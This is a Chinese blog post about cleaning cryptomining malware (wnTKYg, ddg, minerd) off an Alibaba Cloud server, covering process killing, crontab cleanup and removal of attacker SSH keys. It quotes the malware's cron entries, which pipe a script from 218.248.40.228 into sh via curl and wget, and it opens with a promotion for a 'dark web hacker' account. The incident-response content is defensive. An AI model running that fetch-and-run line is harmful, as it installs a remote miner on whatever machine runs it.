服务器遭遇挖矿怎么办？ _服务器

文章插图

大家好！我是每天为大家分享好文的柠檬！与你一起成长~
有需要体系化黑客渗透视频教程可搜索公众号：暗网黑客
（公众号后台回复：tt ，还可额外获得黑客电子书籍）

文章插图

今天分享一篇老文，重在思路！
公司有台做voip的服务器最近CPU总是跑满，这机器自从交给厂家搭好环境后基本就没怎么管它，于是进去查看进程， top了下（见下图）

文章插图

这个叫wnTKYg的进程很诡异，已经把CPU吃光了，上网一查，原来是中了挖矿的马。
（啊，我的天。这只是一个单核1G内存的阿里云主机）
既然被***了，那就得干掉它，下面是解决过程：
1：第一步要先找到这个wnTKYg文件实体，对了还有一个叫ddg.2020的进程。
[root@alitest ~]$ find / -name wnTKYg/tmp/wnTKYg[root@alitest ~]$ find / -name ddg*/tmp/ddg.20202：接着把这两个文件的可执行权限拿掉。
[root@alitest ~]$ cd /tmp[root@alitest /tmp]$ chmod -x ddg.2020 wnTKYg3：杀掉这该死的进程。
[root@alitest /tmp]$ ps -ef | grep -v grep | egrep 'wnTKYg|ddg' | awk '{print $2}' | xargs kill -94：清除无用的定时任务。

[root@alitest /tmp]$ crontab -l*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh

这是挖矿程序生成的定时任务，不清除掉待会进程又起来了。
[root@alitest /tmp]$ echo > /var/spool/cron/root因为这台机器上没有做定时任务，所以就直接清除掉了，如果有其他在用的定时任务，不要这样哦。
5：删除挖矿程序。
[root@alitest /tmp]$ rm -f ddg.2020 wnTKYg6：清除.ssh/下的公钥文件。

[root@alitest ~/.ssh]$ cat authorized_keys ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDUGqxNBCvqd+VNZTcSjyV3bs67sqwXSV+XztaY9QN/DDfeXEfWztdaXPbJvmLE34G.........ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDfxLBb/eKbi0TVVULI8ILVtbv2iaGM+eZbZoCWcD3v/eF1B/VkHAC1YwIhfqkUYudwhxV.................

这台机器并没有上传过公钥文件，所以这就是***者留下的咯，删掉删掉。
[root@alitest ~/.ssh]$ rm -f authorized_keys至此， ***就已经清理完毕了。
小结：
在网上查了一下，发现大部分挖矿***都发生在redis上，而我这台服务器并没有部署redis ，而是当时厂家给装的一套voip环境，因此我怀疑是voip软件的漏洞导致了此次事件，之后再联系厂家看看。
通过这次服务器被***的案例，再一次印证了安全的重要性，安全无小事，继续努力吧。
继上面的挖矿木马解决后，很有自豪感，但是在今天2018-09-09收到阿里云的态势感知的通知又有挖矿病毒了，于是解决。。。
2018-09-09周五阿里云态势感知通知检测到服务器有异常文件下载,当时没太注意，执行下面操作解决问题（简单针对于minerd处理）1、执行 top -i命令查看cpu 使用总过高,使用top -l 查看到是minerd作祟，

文章插图

文章插图

2、果断ps -ef | grep ‘minerd’ 查看pid,3、使用kill -9 程序的pid 杀死掉， 4、到 cd /tmp/下查看是否存有临时文件，如果有rm -rf 删除，没有就算了5、crontab -l 查看是否有定时,有的话到cd /etc/crontab 查看是否有陌生的定时任务，如果有也是直接删除， 6、然后top 再查看，成功了，然后查阅了资料，说redis 漏洞，果断修改了ssh密码，修改redis的端口,修改了登录数据库密码，一切看起来就是这么简单